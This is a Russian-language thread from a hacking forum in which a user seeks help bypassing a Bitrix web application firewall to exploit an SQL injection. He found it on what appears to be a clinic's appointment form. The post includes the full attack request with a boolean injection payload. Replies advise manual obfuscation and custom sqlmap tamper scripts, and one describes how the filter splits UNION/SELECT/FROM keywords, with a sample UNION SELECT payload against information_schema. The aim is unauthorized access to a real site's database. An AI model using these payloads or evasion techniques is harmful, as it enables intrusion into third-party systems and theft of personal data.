• XSS.stack #1 – первый литературный журнал от юзеров форума

Проблема sql injection в bitrix

Отслеживать

gordosnb

floppy-диск
Пользователь
Регистрация
17.07.2022
Сообщения
4
Реакции
13
Нашёл sql инъекцию через Acunetix в POST запросе и при попытки прочитать бд пишет unable to retrieve the table names for any database , --is-dba пишет current user is DBA: False , пробовал --tamper= , но не вышло . На сайте установлен bitrix как я понял там был firewall , есть ли способ его обойти ?
Screenshot_2.png

POST /local/templates/site/ajax/spec_search_form.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://site
Cookie:
Content-Length: 133
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Host: site
Connection: Keep-alive

clinik_id=1&data_record=&doctor=1&fio=1&phone=%2B7(555)-66-6&spec=-1'%20OR%203*2*1=6%20AND%20000489=000489%20--%20&text=&time_record=
Screenshot_3.png
 
Сортировать по дате Сортировать по голосам
Пожалуйста, обратите внимание, что пользователь заблокирован
В bitrix вроде из коробки waf идёт, попробуй вручную предварительно попробовать различные методы обфускации sql запроса для защиты от Waf. (Если что-то неправильно сказал, не ругайтесь сильно).
 
За 0 Против
TiMon4ik сказал(а):
bitrix вроде из коробки waf идёт
В версиях "Старт" и "Стандарт" вроде бы нет.

gordosnb сказал(а):
Нашёл sql инъекцию через Acunetix в POST запросе и при попытки прочитать бд пишет unable to retrieve the table names for any database , --is-dba пишет current user is DBA: False , пробовал --tamper= , но не вышло . На сайте установлен bitrix как я понял там был firewall , есть ли способ его обойти ?
Посмотреть вложение 42148
POST /local/templates/site/ajax/spec_search_form.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://site
Cookie:
Content-Length: 133
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Host: site
Connection: Keep-alive

clinik_id=1&data_record=&doctor=1&fio=1&phone=%2B7(555)-66-6&spec=-1'%20OR%203*2*1=6%20AND%20000489=000489%20--%20&text=&time_record=
Посмотреть вложение 42149
Через SQLMap не раскрутишь. Руками надо чекать что фильтруется и пытаться обходить. После того как будет ясно что фильтруется и как это обходится - писать тампер под мап. Битрикс это тихий ужас в плане вульн, каждый раз с такими таргетами геморрой и горящая жопа.
 
За 0 Против
etc/passwd сказал(а):
Обычно в Битрикс фильтр на from
Оно все фильтрует. UNION, SELECT, FROM, WHERE, CONCAT, WHEN, THEN и.т.д. Фильтрует путем разделения слова на 2 части (ломает пэйлоад).
Отправляем например: union select null,null,table_name,null from information_schema.tables -- -
На выходе после фильтра: uni on sel ect null,null,table_name,null fr om information_schema.tables -- -
 
За 0 Против
c0d3x сказал(а):
Оно все фильтрует. UNION, SELECT, FROM, WHERE, CONCAT, WHEN, THEN и.т.д. Фильтрует путем разделения слова на 2 части (ломает пэйлоад).
Отправляем например: union select null,null,table_name,null from information_schema.tables -- -
На выходе после фильтра: uni on sel ect null,null,table_name,null fr om information_schema.tables -- -
Фильтруется именно свзяка слов, в error based запрос select user() пройдет, но при select user() from mysql.user уже будет ошибка как ты и писал вышел. select user() fr om ....
 
За 0 Против
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх